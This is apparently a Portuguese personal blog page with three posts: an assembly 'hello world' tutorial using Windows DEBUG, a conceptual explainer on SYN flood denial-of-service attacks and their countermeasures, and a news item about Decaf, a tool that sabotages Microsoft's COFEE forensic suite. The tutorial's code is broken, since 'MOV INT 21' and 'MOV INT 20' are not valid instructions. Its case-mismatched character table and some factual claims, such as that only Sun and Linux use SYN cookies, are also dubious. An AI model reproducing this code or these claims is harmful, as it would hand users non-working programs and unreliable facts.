Vou passar, somente os códigos ASCII da mensagem "alo mundo".

CODIGO E LETRA

41 – A

6C – L

6F – O

20 - //ESPACO

6D – M

75 – U

6E – N

64 – D

6F – O

21 – !

24 – $

Para criar este programa, vou usar o programa proprio do windows chamado DEBUG(lê-se debâgui).

Para encontralo, entre no prompt (cmd) do windows de digite: debug

Assim entras no programa...

Agora é preciso colocar os códigos do string na memória.

A função: E

É para informar endereços de deslocamento

A função: A

É para "assemblar", colocar como ponto inicial de deslocamento

A função: mov

Serve para mover

A função: int

Serve para interronper

Agora vamos la….

Entre no programa debug

Informe o endereço de deslocamento a partir de 0200. e informe cada byte da tabela anterior separando-os por espaços em branco. Ficaria assim:

E 0200 41 6C 6F 20 6D 75 6E 64 6F 21 24

Neste caso é necessário informar para o registador geral DX o endereço de deslocamento em que encontra se na a sequência de caracteres. Neste caso, o endereço é 0200. É necessário também definir o valor hexadecimal 09 no registar mais significativo AH, para que um string seja impresso. Execute o comando A 0100.

Ficaria assim:

A 0100

0D0B:0100 MOV AH,09

0D0B:0102 MOV DX,0200

0D0B:0105 MOV INT 21

0D0B:0107 MOV INT 20

0D0B:0109

Obs: quando digitar a penultima linha que é MOV INT 20, é preciso dar dois enter.

O endereço 0D0B, no seu computador pode não ser o mesmo. ISTO E NORMAL!

O CODIGO 09 serve para imprimir uma sequência de caracteres na tela. Se quiseres imprimir somente um caracter, basta colocar no lugar de 09 o c

código 02.

Digite o comando G para que a mensagem seja apresentada.

-G

Alo mundo!

O programa terminou de forma normal

Ai esta o seu programa em assembly

Caso acha esse programa muito difícil de fazer, Então basta fazer o seguinte:

Entre no programa debug e digite:

E 0200 “ALO MUNDO” 24

Programa feito.

Digite: G



——————————————————————-

Caso você queira salvar este programa, basta digitar na linha de comando o debug:

N nomeprograma.com

Depois digitar:

W

Já que estou falando sobre assembly já vou falar a diferença entre assembler e assembly.

Muitas pessoas l confundem as palavras, pois não sabem do que falam.

Assembly é uma linguagem de programação! Não é uma linguagem de maquina, porem é quase isso.

Assembler é um mero compilador de programas assembly.

Cumprimentos,
Miguel Melo Pereira,
conhecimento não é crime :)

Ataque SYN flood

0 coments

SYN flood ou ataque SYN é uma forma de ataque de negação de serviço (também conhecido como Denial of Service – DoS) em sistemas computadorizados, na qual o atacante envia uma seqüência de requisições SYN para um sistema-alvo.

Quando um cliente tenta começar uma conexão TCP com um servidor, o cliente e o servidor trocam um série de mensagens, que normalmente são assim:

  • O cliente requisita uma conexão enviando um SYN (synchronize) ao servidor.
  • O servidor confirma esta requisição mandando um SYN-ACK(acknowledge) de volta ao cliente.
  • O cliente por sua vez responde com um ACK, e a conexão está estabelecida.

Isto é o chamado aperto de mão em três etapas (Three-Way Handshake).


Um cliente malicioso pode não mandar esta última mensagem ACK. O servidor irá esperar por isso por um tempo, já que um simples congestionamento de rede pode ser a causa do ACK faltante, Ou seja. O servidor ficará esperando varias respostas deixando de responder as outras requisições que são feitas por outros clientes.

Esta chamada conexão semi-aberta pode ocupar recursos no servidor ou causar prejuízos para empresas usando softwares licenciados por conexão. Pode ser possível ocupar todos os recursos da máquina, com pacotes SYN. Uma vez que todos os recursos estejam ocupados, nenhuma nova conexão (legítima ou não) pode ser feita, resultando em negação de serviço. Alguns podem funcionar mal ou até mesmo travar se ficarem sem recursos desta maneira.

Algumas contra-medidas para este ataque são os SYN cookies. Apenas máquinas Sun e Linux usam SYN cookies.

Ao contrário do que muitos pensam, não se resolve negação de serviço por Syn flood limitando conexões por minuto (como usar o módulo limit ou recent do iptables), pois as conexões excedentes seriam descartadas pelo firewall, sendo que desta forma o próprio firewall tiraria o serviço do ar. Se eu, por exemplo, limito as conecões SYN a 10/seg, um atacante precisa apenas manter uma taxa de SYNs superior a 10/s para que conexões legítimas sejam descartadas pelo firewall. O firewall tornou a tarefa do atacante ainda mais fácil. Em “Iptables protege contra SYN Flood?” tem uma boa descrição dos motivos pelos quais uma configuração de firewall não resolve.

Um ataque de Syn Flood é feito com os ips forjados (spoof), para que o atacante não receba os ACKs de suas falsas solicitações.


Cumprimentos,

Miguel Melo Pereira "Pirata da Fajã"

Ataque em ferramenta forense da Microsoft

0 coments

Os hackers lançaram um programa que, dizendo eles, pode sabotar a suíte de utilitários forenses que a Microsoft fornece gratuitamente para autoridades no mundo todo.

Conhecida como Decaf, a ferramenta lançada pelos hackers monitora sistemas com o Windows visando detectar a presença do COFEE, uma suíte com 150 utilitários usados pela polícia para a coleta de evidências digitais.

Quando um pendrive com a ferramenta da Microsoft é inserido em um computador com o Decaf, o programa dos hackers executa uma série de medidas contra ela.

A Microsoft fornece o COFEE gratuitamente para as autoridades desde 2007. O COFEE (abreviatura de Computer Online Forensic Evidence Extractor) permite a coleta de histórico de navegação, arquivos temporários e outros dados presentes nos computadores baseados em Windows. A ferramenta da Microsoft é distribuída através da Interpol.

Quando o COFEE vazou na internet em novembro de 2009, a Microsoft minimizou a possibilidade de que os hackers poderiam criar contra-medidas contra sua ferramenta.

O Decaf pode remover os logs do COFEE, desativar os drives USB e até mesmo contaminar ou simular uma grande variedade de endereços MAC (identificadores únicos de placas de rede). Futuras versões permitirão que os usuários travem remotamente os sistemas protegidos.

O Decaf pode ser encontrado em quase todos lugares da internet hoje, a partir do BitTorent.

___________________________________________________________

O que é Prática Forense?

Prática forense é a aplicação de técnicas científicas dentro de um processo legal. Essas práticas envolvem pesquisadores altamente especializados – ou criminalistas – que localizam vestígios. Mas esses vestígios só podem proporcionar provas conclusivas quando são testados em laboratório.

Como os criminosos desenvolveram vias cada vez mais criativas de driblar a lei, nossa força policial foi obrigada a descobrir maneiras mais eficientes de levar esses delinqüentes a julgamento. Mesmo que aparentemente eles não deixem pistas, os detetives(Especialistas) descobriram há algum tempo que isto não é verdade.

Fontes: discoverybrasil, baboo